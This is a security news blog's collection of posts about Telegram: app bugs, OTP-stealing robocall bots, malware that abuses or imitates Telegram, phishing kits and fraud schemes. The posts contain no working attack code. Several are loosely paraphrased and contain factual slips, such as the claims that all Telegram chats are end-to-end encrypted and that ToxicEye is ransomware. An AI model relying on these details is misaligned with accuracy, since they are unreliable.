Search This Blog

Showing posts with label Telegram. Show all posts

Telegram Bug in Mac Allows User To Save Secret Chats

 

Cybersecurity experts have found a technique for Telegram users of Mac to keep self disappearing texts or view the messages without the knowledge of sender. Telegram has an optional "secret chat" feature that ensures privacy of the conversations by providing additional features. If you start a conversation with a Telegram user, the chat becomes end-to-end encrypted, all the messages, media and attachments will be on self-destruct by default, and will disappear from the device after some time. 

But, a new bug found by cybersecurity expert Reegun Richard Jayapaul, Trustwave SpiderLabs' Lead Threat Architect, lets a Telegram Mac user to save self disappearing messages and media permanently. If the files sent in a chat are other than media, they are saved in the cached folder with XXXXXX unique numbers related to a user profile. "As voice recordings, video messages, images, or location sharing images are automatically downloaded to the cache, Reegun discovered that a user could simply copy the media from the cache folder before viewing it in the program," reports Bleeping Computers.

Telegram won't download these attachments unless the recipient downloads it, it is done because these documents generally have a large file size. When a user views the content or reads a message, the self-destruct timer starts, and the chats soon disappear, the content is automatically deleted. However, experts found that the self-disappearing media wasn't removed from the cached folder, and the user had the option of saving it to a different location in the hard drive. The vulnerability was patched by Telegram for MacOs version 7.7 (215786) or later after it was pointed out, however, there's a different bug which allows a user to save self-disappearing media. 

As per the reports, Telegram has told the experts that the issue can't be fixed because there isn't any way to stop second bug from gaining direct access to the app folder. Telegram said "please note that the primary purpose of the self-destruct timer is to serve as a simple way to auto-delete individual messages. However, there are some ways to work around it that are outside what the Telegram app an control (like copying the app’s folder), and we clearly warn users about such circumstances."

New Robocall Bot on Telegram can Trick Targets Into Giving Up Their Password

 

Researchers at CyberNews have identified a new form of automated social engineering tool that can harvest one-time passwords (OTPs) from users in the United States, the United Kingdom, and Canada. 

Without any direct connection with the victim, the so-called OTP Bot may mislead victims into providing criminals credentials to their bank accounts, email, and other internet services. It's exhausting for a probable victim to listen to someone try to scam them blind by taking advantage of their generosity. 

As a new type of bot-for-hire is conquering the field of social engineering, OTP Bot, the latest form of malicious Telegram bot that uses robocalls to trick unsuspecting victims into handing over their one-time passwords, which fraudsters then use to login and empty their bank accounts. Even worse, the newfangled bot's userbase has exploded in recent weeks, with tens of thousands of people signing up. 

How Does OTP Bot Works?

OTP Bot is the latest example of the emerging Crimeware-as-a-Service model, where cybercriminals rent out destructive tools and services to anybody ready to pay, according to CyberNews expert Martynas Vareikis. After being purchased, OTP Bot enables the users to collect one-time passwords from innocent people by simply typing the target's phone number, as well as any extra information obtained via data leaks or the black market, into the bot's Telegram chat window. 

“Depending on the service the threat actor wishes to exploit, this additional information could include as little as the victim’s email address,” says Vareikis. The bot is being marketed on a Telegram chat channel with over 6,000 users, allowing its owners to make a lot of money by selling monthly memberships to cybercriminals. Meanwhile, its users brag about their five-figure profits from robbing their targets' bank accounts. 

Bot-for-hire services, according to Jason Kent, a hacker in residence at Cequence Security, have already commoditized the automated threat industry, making it very easy for criminals to enter into social engineering. 

Kent told CyberNew, “At one time, a threat actor would need to know where to find bot resources, how to cobble them together with scripts, IP addresses, and credentials. Now, a few web searches will uncover full Bot-as-a-Service offerings where I need only pay a fee to use a bot. It’s a Bots-for-anyone landscape now and for security teams.” 

Gift cards make the scam go-round: 

Card linking is the most common scamming tactic used by OTP Bot subscribers. It comprises linking a victim's credit card to their mobile payment app account and then purchasing gift cards in real stores with it.

“Credit card linking is a favorite among scammers because stolen phone numbers and credit card information are relatively easy to come by on the black market,” reckons Vareikis. 

“With that data in hand, a threat actor can choose an available social engineering script from the chat menu and simply feed the victim’s information to OTP Bot.” 

The bot also contacts the victim's number, acting as a support representative, and tries to mislead them into giving their one-time password, which is necessary to log in to the victim's Apple Pay or Google Pay account, using a fake caller ID. The threat actor can then link the victim's credit card to the payment app and go on a gift card buying spree in a nearby physical store after logging in with the stolen one-time password. 

Scammers use linked credit cards to buy prepaid gifts for one simple reason as they leave no financial footprints. This is particularly useful during a pandemic, when mask regulations are in effect in almost all interior areas, making it considerably simpler for criminals to conceal their identities throughout the process. 

Since its release on Telegram in April, the service looks to be gaining a lot of momentum, especially in the last few weeks. The OTP Bot Telegram channel currently has 6,098 members, a massive 20 percent growth in just seven days. 

The simplicity of use and the bot-for-hire model, which allow unskilled or even first-time fraudsters to easily rob their victims with the least input and zero social contact, appear to be some of the reasons for the fast rise. In fact, some OTP Bot users blatantly broadcast their success tales in the Telegram conversation, flaunting to other members of the channel about their ill-gotten gains. 

Based on the popularity of OTP Bot, it's apparent that this new sort of automated social engineering tool will only gain more popularity. Indeed, it'll only be a matter of time until a slew of new knockoff services hit the market, attracting even more fraudsters looking to make a fast buck off unsuspecting victims. 

The creator of Spyic, Katherine Brown, warns that as more bots enter the market, the opportunities for social engineering and abuse will grow exponentially. “This year we’ve already seen bots emerge that automate attacks against political targets to drive public opinion,” says Brown. 

The growth of social engineering bots-for-hire is even more alarming, according to Dr. Alexios Mylonas, senior cybersecurity lecturer at the University of Hertfordshire, since the pandemic has put greater limitations on our social connections. 

“This is particularly true for those who are not security-savvy. Threat actors are known to use automation and online social engineering attacks, which enables them to optimize their operations, to achieve their goals and the CyberNews team has uncovered yet another instance of it,” Mylonas stated CyberNews. 

How to Recognize Social Engineering Scams?

Keeping all of this in mind, understanding how to detect a social engineering attempt is still critical for protecting money and personal information. Here's how to do it: 

1.Calls from unknown numbers should not be answered. 

2.Never give out personal information: Names, usernames, email addresses, passwords, PINs, and any other information that may be used to identify you fall into this category. 

3. Don’t fall into the trap: Scammers frequently use a false feeling of urgency to get targets to hand up their personal information. If someone is attempting to persuade the user to make a decision, they should hang up or say they will call back them later. Then dial the toll-free number for the firm they claim to represent. 

4.Don't trust caller ID: By mimicking names and phone numbers, scammers might impersonate a firm or someone from your contact list. 

Financial service companies, on the other hand, never call their clients to validate personal information. They will simply block the account if they detect suspicious behavior and expect the user to contact the firm through official means to fix the problem. As a result, be watchful, even if the caller ID on your phone screen appears to be legitimate.

XCSSET, a MacOS malware, Targets Google Chrome and Telegram Software

 

As part of further "refinements in its tactics," a malware notorious for targeting the macOS operating system has been updated to add more elements to its toolset that allow it to accumulate and exfiltrate sensitive data saved in a range of programmes, including apps like Google Chrome and Telegram. This macOS malware can collect login credentials from a variety of apps, allowing its operators to steal accounts. 

XCSSET was discovered in August 2020, when it was found to be targeting Mac developers using an unusual method of propagation that entailed injecting a malicious payload into Xcode IDE projects, which is executed when the project files are built in Xcode. XCSSET collects files containing sensitive information from infected computers and delivers them to the command and control (C2) server. 

Telegram, an instant messaging service, is one of the apps that has been attacked. The virus produces the “telegram.applescript” archive in the Group Containers directory for the “keepcoder.Telegram” folder. By obtaining the Telegram folder, the hackers are able to log into the messaging app as the account's legal owner. The attackers gain access to the victim's account by moving the stolen folder to another machine with Telegram installed, according to Trend Micro researchers. Normal users have read and write permissions to the Application sandbox directory, XCSSET can steal sensitive data this way. 

The malware can read and dump Safari cookies, inject malicious JavaScript code into multiple websites, steal information from programmes like Notes, WeChat, Skype, and Telegram, and encrypt user files, among other things. Earlier this month, XCSSET received an update that allowed malware developers to target macOS 11 Big Sur as well as Macs with the M1 chipset by getting beyond Apple's new security standards in the current operating system. 

"The malware downloads its own open tool from its C2 server that comes pre-signed with an ad-hoc signature, whereas if it were on macOS versions 10.15 and lower, it would still use the system's built-in open command to run the apps," Trend Micro researchers previously noted. 

According to a new report released by the cybersecurity firm on Thursday, XCSSET uses a malicious AppleScript file to compress the Telegram data folder ("/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram") into a ZIP archive file before uploading it to a remote server under their control, allowing the threat actor to log in using the victim's account. 

"The discovery of how it can steal information from various apps highlights the degree to which the malware aggressively attempts to steal various kinds of information from affected systems," the researchers said.

Telegram Pavel Durov says that since 2018 he knew about the potential surveillance of his phone

The billionaire said he had known since 2018 that one of his phone numbers was on the NSO Group list, but was not worried about it.

"Since 2011, when I was still living in Russia, I used to think that all my phones were hacked. Anyone who gets access to my personal data will be extremely disappointed, as he will have to view thousands of Telegram feature concepts and millions of messages related to the development process of our product. He will not find any important information there," Durov explained.

At the same time, he recalled that surveillance tools were also used against "much more significant" people, including more than 10 heads of state. "A huge problem for humanity", according to the businessman, is created by "backdoors" that smartphone and software manufacturers deliberately leave in their systems.

"According to Snowden's 2013 revelations, Apple and Google are part of a global surveillance program. These companies should introduce backdoors into their mobile operating systems. These backdoors, usually disguised as security bugs, allow US intelligence agencies to access information on any smartphone in the world," Durov wrote. 

According to Durov, at the same time, access to these vulnerabilities can be obtained not only by the US authorities but also "any other organization that finds them."

"It is not surprising that this is exactly what happened: the Israeli company NSO Group sold access to spy tools that allowed third parties to hack tens of thousands of phones," the billionaire noted.

Recently, The Guardian reported that the Telegram founder's British mobile number was on a list of potential surveillance targets in 2018.

The publication suggested that the authorities of the United Arab Emirates could have shown interest in Durov since the appearance of the entrepreneur's number on the list coincided with his move to this country.

Telegram's Encryption Protocol Detected with Vulnerabilities

 

A multinational computer team claimed on Friday that the popular encrypted chat app Telegram is detected with four cryptographic vulnerabilities by their researchers. 

The vulnerabilities, based on the security study, range from technically trivial and easy to use to advanced and of theoretical interest. But in the end, it is demonstrated by ETH Professor Kenny Paterson, who was a member of the team that exposed the vulnerability, that the four important aspects could be done better, more secure, and more efficiently using a standard approach to cryptography. 

Telegram's a cloud-based free, open-source instant messaging app on cross-platform. This program also provides encoded video calling, VoIP, file sharing, and various other functions from one end to the next. It was launched in August 2013 for iOS and in October 2013 for Android. 

The greatest vulnerability found by researchers is what they call the vulnerability "crime pizza." An attacker could modify the sequence of messages from a client to a telegram-operated cloud server in this easily. 

“For example, if the order of the messages in the sequence ‘I say “yes” to’, ‘pizza’, ‘I say “no” to’, “crime” was altered then it would appear that the client is declaring their willingness to commit a crime,” according to the universities.

An attacker may detect which of two communications is encrypted by the client, even if particular circumstances are required to do so using one of the more theoretical vulnerabilities. 

Rather than using more common protocols like Transport Layer Security, Telegram uses its MTProto encryption protocol. In the past, too, cryptographers have skeptically eyed MTProto. The recent investigation recalls that while encrypted apps give considerable protection, they are not 100% impermissible to use. 

The flaws in the telegram were reported by cryptographers from ETH Zürich, a public research university in Switzerland, and the Royal Holloway constituent college of the University of London. 

“For most users, the immediate risk is low, but these vulnerabilities highlight that Telegram fell short of the cryptographic guarantees enjoyed by other widely deployed cryptographic protocols,” a university summary states. 

Telegram wrote that it made changes in response to the disclosure “that make the four observations made by the researchers no longer relevant.” 

Further, it has also revealed that there were no critical vulnerabilities. 

“We welcome any research that helps make our protocol even more secure,” Telegram said. “These particular findings helped further improve the theoretical security of the protocol.”

Toxic Eye Malware is Utilizing Telegram

 

As of 2021, numerous users left WhatsApp for messaging to various other applications that promised improved data protection only after the company announced that it might default share user metadata with Facebook. Many of those users turned to Telegram and Signal, which proves to be the competitive applications against WhatsApp. 

As per Sensor Tower, Telegram was perhaps the most installed application with over 63 million downloads in January 2021. Telegram chatting is still not encoded as in Signal Chat end-to-end encryption is there, but now Telegram does have another issue: malware. 

Software Check Point team recently found that cybercriminals use Telegram for something like a malware program named Toxic Eye as a communications platform. It turns out that certain aspects of Telegram are much more readily accessible by attackers than it is by web-based tools. Today, they have handy Telegram Bots to mess up with compromised machines. 

Toxic Eye is a kind of malware known as a remote access trojan (RAT). RATs can remotely monitor an intruder over an infected machine, which means that the attacker could steal host computer data, destroy, or copy files, hamper the operations of an infected machine, and much more. The Toxic Eye RAT is distributed through an e-mail with an encoded EXE file to a destination. The software installs the malware on the user computer if the target users access the file. 

RATs are comparable to programs of remote access and can be used to control user devices, for instance, by someone in technical support. However, even without authorization, these programs sneak in. They could imitate or hide with legitimate files that sometimes are concealed as a document or are inserted in a broader video game file. 

Attackers used Telegram to remotely manipulate malicious software. Check Point analyst Omer Hofman claims that from February until April 2021 the company found 130 Toxic Eye attacks with this tool, and some items make Telegram valuable to bad players who distribute malware. 

The firewall program doesn't obstruct Telegram. The network control tools are also not blocked. It's a user-friendly app that most people recognize as genuine, then let their guards down. 

The researcher's advice is that one must not access email attachments from unidentified senders, which raises suspicion. Also, take care of appendices containing usernames. Malicious emails also contain the username or an attachment title in the subject line. It is possibly malicious if the sender attempts to sound urgent, dangerous, or compulsive and forces the user to click upon a link or attachment or to provide sensitive data. If possible, then one must use anti-phishing tools.

RedLine Stealer: Masquerades as Telegram Installer

 

The .Net-based malware has recently been disguised as an installer of the popular secure messaging app, Telegram. 

Stealers are pieces of malicious code written with a hit-and-run mindset, intending to find something of value on an infected computer and return it to its owner. These sinister viruses usually infect through a second-stage payload or by masquerading as legitimate apps. One such stealer is Redline Stealer, which is often used by attackers to steal credentials from unsuspecting users.

According to Minerva, RedLine Stealer employs evasive techniques to bypass the security products, which begins with the unpacking process. The fake setup file is packed and highly obfuscated, like most of the .Net malware. No known packer is found using Detect-It-Easy, implying that the unpacking must be performed manually. 

Most of the variable and function names were scrambled after decompiling the malware, making it difficult to understand the code. The packer developer also decided to implement control flow flattening into the packer in order to make any reverse engineering effort truly miserable. Control flow flattening takes the normal program control flow and modifies it using numerous if/while statements. 

Packers typically use stenography or encryption in their arsenal, what appears to be malformed image files are actually the malicious payload, which is decoded and decrypted by a custom algorithm in the resources directory. 

The payload data is concealed inside the RGB values of image pixels. The first pixel contains the size of the meaningful data inside the image, while the others include the actual data. 

After decoding the image, the packer decodes the payload with the RC2 cipher, revealing and loading a file called "Lightning.dll" into memory. An object named "GameCore.Core" is instantiated from the in-memory DLL file, and inside it, a function named "Game" receives yet another image file from the binary's resources directory, along with a hardcoded key. 

The "Game" feature decrypts the final payload and then uses process injection to load the malware into another process's memory space. The payload is then identified, and it is fully un-obfuscated, which allowed seeing its C&C address in cleartext, Minerva reported.

ToxicEye: Trojan Abuses Telegram to Steal Data

 

The Telegram service is being exploited by operators of a new Remote Access Trojan (RAT) to keep control of their malware. ToxicEye is a ransomware that uses Telegram as part of its command-and-control (C2) infrastructure to steal data. 

In a blog post published on Thursday, Check Point Research's Omer Hofman stated that the latest remote malware has been seen in the wild, with over 130 attacks reported in the last three months.

Telegram is a communication platform and instant messaging service that has recently seen a boost in popularity as a result of the recent controversy surrounding WhatsApp's data-sharing policies with Facebook. The platform, which has over 500 million monthly active users, has also proven popular among cybercriminals who use it to distribute and execute malicious software. 

ToxicEye operators start the attack chain by creating a Telegram account and a bot. Bots are used for several tasks, such as reminders, searches, issuing orders, and launching surveys. In this case, however, the malware's configuration includes a bot for malicious purposes. 

According to researchers, "Any victim infected with this malicious payload can be attacked via the Telegram bot, which connects the user's device back to the attacker's C2 via Telegram." 

Phishing emails with malicious document attachments are sent to intended victims. ToxicEye is launched if a victim allows the resulting malicious.exe file to be downloaded. The ToxicEye RAT has a variety of features, which include the ability to search for and steal credentials, computer OS data, browser history, clipboard content, and cookies, as well as pass and deletes files, disable PC processes, and hijack task management. 

Furthermore, the malware can install keyloggers and gain access to microphones and camera peripherals to capture audio and video. The researchers discovered ransomware characteristics such as the ability to encrypt and decrypt victim data. 

The user should check for "C:UsersToxicEyerat.exe" if suspects an infection. This applies to both personal and business use, and if a file is discovered, it should be deleted immediately. 

Researchers stated, "Given that Telegram can be used to distribute malicious files, or as a C2 channel for remotely controlled malware, we fully expect that additional tools that exploit this platform will continue to be developed in the future.”

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data

 

Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram for gathering user data stolen on phishing websites. Emails remain the popular method among threat actors to exfiltrate stolen data but these methods foreshadow a new trend in the evolution of phishing kits.

After analyzing the phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools permit collecting users' stolen data using Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or firm or even several at once. Phishing kits are often sold to those hackers who do not have exceptional coding skills. These phishing kits allow them to design an infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. Besides, a thorough examination of the phishing kit helps researchers in detecting digital footprints that might lead to the developers of the phishing kit.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands which were on the target list of cybercriminals, most of them being for online services (30.7% - online tools to view documents, online shopping, streaming service, and more,) email customers (22.8%), and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google, and Yahoo.

Another trend the researchers noticed was that the developers of phishing kits were double-dipping to increase their profits by adding code that copies the stream of stolen data to their network data host. Security researchers explained that one method is by configuring the ‘send’ function to deliver the information to the email provided by the buyer of the phishing kit as well as the ‘token’ variable linked with a concealed email address.

“Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocking phishing websites with new web pages,” Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.

Malware Campaign Targets Telegram Desktop Application

 

An independent security researcher based in Basel, Switzerland, Jannis Kirschner, began to look for the widely known Telegram desktop version on the internet on Sunday. The second Google result was an advertisement, which led him directly to malware cloaked as a Telegram for Windows desktop version. At first sight, it was sufficiently convincing for Kirschner to say that "almost fell for it myself." 

Malware vendors are habituated to use the same publicity tools that online businesses use to attract people. To stop such abuse, Google patrols its advertising ecosystem, but malware advertising is still an ongoing problem. Although a visit by telegramdesktop[dot]com to one of those sites now triggered an alert from the Google Safe Browsing service, that the two sites were unsafe and potentially still active and duplicated others. These include the telegraph[dot]net and the telegram[dot]org. The websites were reported to Google by Kirschner. 

Each of these three spoofed websites is Telegram's clones. All links on cloned sites are redirected to the legitimate Telegram domain, design.telegram.com. But one link is exchanged which is supposed to be the execution for the Telegram Desktop version of Windows. 

"A repo probably was a bad choice for delivering malware since it's very verbose (download numbers, time, and other documents)," Kirschner says. "The biggest opsec mistake was that they didn't clean one of the repo's metadata, which led me to discover commit messages and their e-mail [address]."

He further adds that "I believe that it is the same threat actor or group since the TTPs [tactics, techniques, and procedures] are the same, and all sites have been established in a very close timeframe using the same hoster and certificate authority." 

At least a temporary benefit is offered to host malware on platforms such as Bitbucket: surface links are often deemed to be genuine, and attackers are subject to a malicious reservoir that needs to be removed until someone reports it. The techniques help cover a technological filtering and manual screening campaign, but don't always measure properly, says Kirschner. 

A February 2020 report by the security firm Cybereason reported over half a dozen newcomers, crypto miners, ransomware, and other malware put on Bitbucket by bad actors. 

The telegramdesktop[dot]com website seems to be shared with Moldova. Kirschner says this domain was registered on 29 December 2020. A search in the Wayback Machine of the Internet Archive, reveals that telegramdesktop[dot]com was redirected to the rightful domain telegram.org in April 2018. However, according to DomainTools records, the domain expired in October 2018. 

"I assume that domain once belonged to Telegram themselves, expired and was taken over by the criminals now," Kirschner further says.

Sift Exposes New Telegram Fraud Scheme to Exploit Restaurants and Food Delivery Apps

 

As the popularity of food delivery apps is increasing with each passing day so is the revenue,  as a consequence, these apps have been on the hit list of scammers. Sift, a US-based digital trust and safety firm has stated that it has spotted a fraud scheme where scammers leverage the chatting app Telegram to steal from restaurants and food delivery apps.

Sift’s Digital Trust and Safety experts discovered that threat actors are promoting their services on Telegram forums to buy food and beverage orders at steep discounts, using stolen payment information on behalf of clients.

The methodology used by fraudsters

Professional scammers advertise in Telegram forums, such as ‘Fraud Market’ that they can illicitly buy food and beverage orders at a steep discount, typically 60-75% off. Diners who are tempted to take advantage of this offer direct-message the scammers along with a screenshot of their food app shopping cart and their delivery address to place the order.

The scammer accepts the order and the diner pays the scammer using cryptocurrency such as Bitcoin or Ethereum via PayPal, Venmo, or Cash App and the scammer covers the whole cost via a new account, stolen credit card information, or a hacked account.

Brittany Allen, trust and safety architect at Sift explained that “the Dark Web can be difficult to access and with frequent marketplace shutdowns by law enforcement, bad actors are looking for new places to commit a crime. End-to-end encrypted messaging platforms like Telegram are attractive options as they are more accessible and it is easier to go undetected when committing low-level fraud.”

Sift experts disclosed that from the third quarter to the fourth quarter of 2020 there was a 14% increment in payment scams targeting restaurants and food delivery apps. This is not the first scheme that Sift experts have uncovered to exploit the restaurants and food delivery services.

Cyber Criminals trying to hack Russian popular Telegram channels using ads from GeekBrains

 The owners of the Telegram channels noted that scammers under the guise of advertising offers send malicious files.

" In particular, they can be represented by advertising managers of the GeekBrains educational platform", Nikita Mogutin, the co-founder of the Telegram channel Baza (more than 310,000 subscribers), wrote on Facebook. Owner of the Telegram channel Madonna (more than 9500 subscribers) Madonna Moore said that five scammers write to her a day. She also published the text of correspondence with a person who introduced himself as a representative of GeekBrains. 

GeekBrains has received many complaints about fraud on behalf of the company and has already sent out warnings to agencies and bloggers, said Elena Toropina, head of the company's marketing department. In her opinion, the attack on the channels is connected with the growth of the online education industry, which spends a lot of money on advertising.

Kaspersky Lab reported that the attachments sent by the attackers contain a Trojan virus. 

"If the victim runs the file, a program will be installed on the computer that will steal the accounts stored on it and provide fraudsters with hidden remote control of the Telegram channel", told Yaroslav Kargalev, deputy head of the Group-IB incident response center. According to him, scammers can also change the phone number in the channel's account to get full control over it.

Most often, channel theft is needed to publish links to malicious resources in the Telegram channel or to get a ransom, said Sergey Trukhachev, head of the special services unit of Infosecurity a Softline Company.

"The increase in the activity of scammers may be associated with the influx of new users to Telegram", noted Kargalev.

Telegram downloads have increased dramatically as WhatsApp has added a clause to its rules that allows users to share their personal data with Facebook. Moreover, the growing popularity of Telegram is due to the fact that supporters of Donald Trump, who was blocked in many social networks, have "flowed" there.

Telegram founder Pavel Durov called the sharp increase in the number of new users "the largest digital migration" in human history. In the first week of January, Telegram's monthly audience overcame the mark of 500 million active users.

Earlier, E Hacking News reported that Pavel Durov advised users to remove WhatsApp from smartphones. He called the WhatsApp application unsafe.


WhatsApp Clients Resort to Other Messaging Platforms

 

WhatsApp has told its two billion clients they should permit it to share information with its parent organization Facebook if they wish to keep utilizing it. All WhatsApp clients would not be able to proceed with the service except if they accept the new terms by 8 February. The stage said the update will empower it to offer features, for example, shopping and payments. 

Message platforms Signal and Telegram have both seen a gigantic surge in downloads around the world over after a questionable update to WhatsApp's terms and conditions. 

As per information from analytics firm Sensor Tower, Signal was downloaded all around the world multiple times the week before WhatsApp declared the change on 4 January and 8.8 million times the week after. This included big surges in India, where downloads went from 12,000 to 2.7 million, the UK from 7,400 to 191,000, and the US from 63,000 to 1.1 million. In a progression of tweets, Signal said a few people were detailing issues with creating groups and postponements to verification codes showing up in light of the fast development but that it was addressing the issues. 

Telegram has proved to be even more popular, with downloads booming all around the world from 6.5 million for the week starting 28 December to 11 million over the next week. In the UK, downloads went from 47,000 to 101,000. Furthermore, in the US they went from 272,000 to 671,000. During the same period, WhatsApp's worldwide downloads shrank from 11.3 million to 9.2 million. 

One industry watcher said he didn't think this fundamentally spoke to a major issue for WhatsApp, which has been downloaded 5.6 billion times since its launch in 2014. 

"It will be hard for opponents to break user habits, and WhatsApp will keep on being one of the world's most popular and broadly utilized messaging platforms," said Craig Chapple, mobile insights strategist at Sensor Tower. 

WhatsApp reassured its clients that it doesn't keep logs of every individual who is messaging, it can't see your shared location, it doesn't share your contacts to Facebook, and that groups can stay private. It likewise exhorts clients that they actually have the choice to set messages to disappear and that they can't download their information. WhatsApp's clarification may figure out how to reassure a few clients that the privacy changes aren't as troubling as first dreaded, yet for other people, it might have come past the point of no return.

Researcher Exposes Telegram's Location Bug, Company Say It's a Feature

An expert who observed that messaging platform Telegram's "People Nearby" feature revealed risk of accurate user location, is now informed that the feature is "working as expected." Users who use the "People Nearby" feature can view a list of other telegraph users within a short mile radius. Users can also find local group chats.  

Ahmad Hassan used a software that allowed him to fake the location of his Android phone, using it, he found locations of individuals from three different points. He used trilateration to pinpoint exact user location. Using this method, Ahmed could get accurate location of the users, including their home addresses, which is quite easy.  Hasan had found the issue hoping to get Bug Bounty as a reward, instead, he was told that the Telegram users share their locations intentionally i the "People Nearby" section. To determine the exact location of the users, one can expect sometimes to find it under certain conditions.  

But Hasan says that when a user allows "People Nearby" location, he is indirectly posting his residential address online. Many of the users are unaware of this information while they are using the feature. He also believes a widespread problem exists where hackers or users with malicious intent can use fake locations to join local group chats, and attack users with spams or phishing attacks using malicious links. It includes fraud links and fake Bitcoin investments, which is a proof to the poor app security.  Telegram claims that their platform is "more secure than mass market messengers like WhatsApp and Line." 

However, Telegram fails to mention the risks that can arise from malicious users. Others apps in recent times have also experienced the location issue.  The Register reports, "obtaining the location of nearby users is not an issue exclusive to digital devices. A stranger may follow someone home, for example. It is also not so long ago that a huge printed directory of local names, addresses, and telephone numbers used to be delivered to almost every home in many countries – and in the UK BT's online Phone Book service still offers a person search, including address details for those who have not opted out."

The European Commission added VKontakte and Telegram to the list of pirate sites

VKontakte is surprised by the decision of the European Commission to include the social network in the list of resources that contribute to online piracy, the company has been interacting with copyright holders for many years and quickly restricts access to controversial content

The European Commission has published a new list of resources that promote piracy and can benefit from it. The list for the first time included the Telegram messenger and the social network VKontakte.

The list is formed on the basis of reports from groups of right holders. According to the European Commission, Telegram users, including using public channels, "exchange illegal content, in particular music, books, news publications, films and TV programs." In addition, subscribers share links to other sites that host pirated content.

The social network "VKontakte" is also included in the list due to many complaints from copyright holders. Users of the social network can have unauthorized access to books, as well as to movies and TV shows, in particular through the built-in video players.

Both Telegram and VKontakte objected to their inclusion in the"piracy watch list". Telegram told the European Commission that it "does not tolerate any malicious content on its platform" and removes it within 24 hours. VKontakte also noted that it is fighting piracy. In particular, the social network indicated that the copyright holder can complain about copyright infringement through an electronic form. According to VKontakte, its employees processed more than 1.36 million such complaints, most of which ended with the removal of content.

"We are surprised by the inclusion of VKontakte in this list, as for many years we have been actively interacting with copyright holders in various areas," said the press service of the social network.

According to them, the company signed agreements with the world's largest copyright holders of music products, including Universal Music, Sony Music, and Warner Music, The Orchard, Merlin Network, Believe Digital.

Hackers attacked major Telegram channels via video on Yandex

 On November 10, hackers conducted a major attack on popular Telegram channels. Reddit's administrators completely lost access to the channel, to which 236 thousand people were subscribed. The attackers used the old scheme: they simply sent the Trojan-infected file to the administrators

Hackers stole the Telegram channel of the Reddit forum, administrators could not log in to the control panel. The Telegram channel Baza was also attacked, but the attackers failed to gain access to the channel.

The hackers had the following scheme: they offered to buy advertising space, but first they asked to watch a video with their materials, which could be downloaded from Yandex.Disk. The document could not be opened on a mobile device, and hackers offered to download it to a desktop computer.

After launching the file, the owner of the Reddit channel with 236 thousand subscribers was no longer able to access it.

General Director of the lab Studio.AG Artem Geller explained that this is a very old method of fraud, and Windows is an object for such files. Hackers, under various pretexts, send material containing malware. It allows access to the entire operating system if the victim opens the file. In this particular case, the attackers were interested in Telegram, so the Reddit account was stolen.

Can't blame Yandex.Disk for missing the Trojan. According to Geller, about 300,000 new viruses appear every day in the world, so it's simply impossible to catch them all. Moreover, it may not be a new virus, but a modification of the old one. At the same time, the Trojan has no task to destroy the computer system.

Cloud storage is a convenient way for fraudsters, because they can upload a file of any size there, unlike email. Unprotected, unencrypted files without passwords are loaded into these vaults.

According to the information security expert Alexander Vlasov, we must remember one thing: those who provide the service for free, never sign up to the fact that they will protect your files. Yes, they are trying to track malware, but within the general outline of the ecosystem.

Apple denied Durov's statement about the request to block Telegram channels about Belarus

The founder of Telegram, Pavel Durov, accused Apple of trying to "avoid responsibility for complying with its own rules" by using "tricky language". Durov wrote about this in his Telegram channel.

Earlier, Durov said that the Corporation requested the blocking of three channels dedicated to Belarus. They published photos and personal data of security forces and members of election commissions who, according to the authors, committed violations in the elections. The total number of subscribers was about 100 thousand.

According to Durov, Apple's "trick" lies in the company's claim that it does not require disabling three Belarusian channels that disclose the personal data of security forces involved in suppressing protests. Apple requires not to publish posts that disclose personal information. However, Durov notes, the company does not mention that these channels consist entirely of such posts.

"By hiding its requirements in vague words, Apple is trying to avoid responsibility for complying with its own rules", said the founder of Telegram.

"It's time for Apple to learn to take responsibility for its policies, rather than trying to hide them from users,” added he.

According to Durov, he would prefer to keep these channels. The founder of Telegram suggested that they will eventually be blocked on devices using the iOS operating system, but the channels will remain available on other platforms.

According to Apple, the company received complaints from users that their personal data, including names and phone numbers, was transmitted through channels. These complaints were passed to the messenger team, asking them to remove information that reveals someone's personal data on the Internet without their consent, as well as content aimed at specific people.

Telegram did not raise any objections, but promised to check this information and inform Apple about the results of the check.

Earlier, E Hacking News reported that a group of hackers threatens to bring down the tax, energy and banking systems of Belarus if the head of state Alexander Lukashenko does not comply with the ultimatum.

Telegram Takes Down Islamist Propaganda on its Platform, Extremist Groups Struggle


The social networks and US military have imposed high regulations to control Islamist propaganda on social media and have been able to take down Islamic State terrorist groups. After this move, experts say these groups are now struggling to recover their control on the mainstream social media apps and networks. As most of the major social networking sites have choked the group, the Islamist group has tried to build its propaganda on small sites. But even there, it has met by strong regulations by the authorities. According to Europol, an EU (European Union) law agency, the social networking companies have tried to bring down these Islamist propaganda content growing on their websites, in an attempt to take down the extremist group activities on social media.


Europol, in its report, said, "While Google and Instagram deployed resilience mechanisms across their services, Telegram was the online service provider receiving most of the referral requests during this Action Day. As a result, a significant portion of key actors within the IS network on Telegram were pushed away." These extremist groups used Telegram as their primary platform of propaganda until 2019.

According to Europol, Telegram had removed up to 5000 terrorist profiles and bots in two days, in an effort against shutting down the Islamist propaganda. Earlier, it was only able to take down 200-300 accounts on average. After that incident, the extremist groups moved towards more covert apps like the Russian "TamTam" and "Hoop Messenger." Canada hosts these websites. The IS, in apparent desperation, has also started using chat services designed for blockchain developers to spread their messages. In 2016-17, the US cyber command took action against these extremist groups. It shut down recruitment groups and suppressed their further attempts to spread the messages.

Currently, the US cyber command has presidential approval to combat IS propaganda with cyberattacks. They have also widened their jurisdiction area since then. "In the past year and a half, Telegram has also put forth a considerable effort to root out the abusers of the platform by bolstering its technical capacity in countering malicious content and establishing a close partnership with Europol," says Europol.

Pavel Durov called on Apple to oblige to install different application stores


Apple should allow users to install apps not only from its own App Store. This opinion was expressed by the founder of Telegram messenger Pavel Durov. According to him, Tim Cook (CEO of Apple) should be obligated to this at the legislative level.

